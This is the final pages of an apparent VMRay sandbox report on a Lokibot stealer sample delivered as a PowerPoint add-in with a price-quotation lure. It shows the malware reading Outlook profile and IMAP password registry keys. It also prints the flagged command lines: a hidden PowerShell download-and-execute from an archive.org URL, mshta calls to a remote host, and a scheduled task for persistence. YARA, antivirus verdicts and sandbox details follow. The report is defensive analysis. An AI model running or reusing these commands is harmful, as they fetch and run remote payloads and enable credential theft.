HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\dc48e7c access msbuild.exe CLEAN 6d33441458035ee20beefe18a
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\dc48e7c read, access msbuild.exe CLEAN 6d33441458035ee20beefe18a\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\e57f6d0 access msbuild.exe CLEAN b27b6134693ca7113a4ab34a6
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\e57f6d0 read, access msbuild.exe CLEAN b27b6134693ca7113a4ab34a6\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\f35c115 access msbuild.exe CLEAN 766b7c94cb080da6869ae8f9d
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\f35c115 read, access msbuild.exe CLEAN 766b7c94cb080da6869ae8f9d\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\f86ed29 access msbuild.exe CLEAN 03a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\f86ed29 read, access msbuild.exe CLEAN 03a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\SOFTWARE\flaska read, access msbuild.exe CLEAN .net\trojita\imap.auth.pass Reduced dataset
Process
Process Name Commandline Verdict
C:\Windows\SysWOW64\mshta.exe https:// mshta.exe SUSPICIOUS 1230948%[email protected]/awkdhikhasd
"C: \Windows\System32\WindowsPowerShell\v1.0\powershell.exe " -w h i'E'x(iwr('https://ia801500.us.archive.org/0/items/ powershell.exe SUSPICIOUS 1_20210527_202...... /0/items/1_20210527_20210527/1.txt') - useB);i'E'x(iwr('https://ia801500.us.archive.org/0/items/ 1_20210527_20210527/1.txt') -useB);
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE / schtasks.exe mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http:// SUSPICIOUS 1230948%[email protected]/p/44.html\""
MsHtA "http://1230948%[email protected]/p/ mshta.exe SUSPICIOUS 44.html"
msbuild.exe #cmd SUSPICIOUS
"C:\Program Files (x86)\Microsoft powerpnt.exe CLEAN Office\Root\Office16\POWERPNT.EXE"
svchost.exe C:\Windows\system32\svchost.exe -k netsvcs CLEAN
X-Ray Vision for Malware - www.vmray.com 48 / 50 DYNAMIC ANALYSIS REPORT #1559276
YARA / AV
YARA (2)
Ruleset Name Rule Name Rule Description File Type Filename Classification Verdict
Malware Lokibot Lokibot Stealer Memory Dump - Spyware 5/5
function_strings_proces Malware Lokibot Lokibot Stealer Function Strings Spyware 5/5 s_13.txt
Antivirus (4)
File Type Threat Name Filename Verdict
EMBEDDED VBA:Amphitryon.217 ooo.bin MALICIOUS
C:\Users\RDhJ0CNFevzX\Desktop\Request SAMPLE VBA:Amphitryon.217 MALICIOUS For Price quotation 1-6-2021.ppam
MODIFIED VB:Trojan.Valyria.4726 - MALICIOUS
MEMORY_DUMP Gen:Variant.Razy.762033 - MALICIOUS
X-Ray Vision for Malware - www.vmray.com 49 / 50 DYNAMIC ANALYSIS REPORT #1559276
ENVIRONMENT
Virtual Machine Information
Name win10_64_th2_en_mso2016
Description win10_64_th2_en_mso2016
Architecture x86 64-bit
Operating System Windows 10 Threshold 2
Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)
Network Scheme Name Local Gateway
Network Config Name Local Gateway
Analyzer Information
Analyzer Version 4.1.1
Dynamic Engine Version 4.1.1 / 02/08/2021 15:19
Static Engine Version 1.6.0
Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)
Built-in AV Database Update 2021-06-01 05:09:28+00:00 Release Date
VTI Ruleset Version 3.8
YARA Built-in Ruleset Version 1.5
Analysis Report Layout Version 10
Software Information
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Internet Explorer Version 11.0.10586.0
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed
X-Ray Vision for Malware - www.vmray.com 50 / 50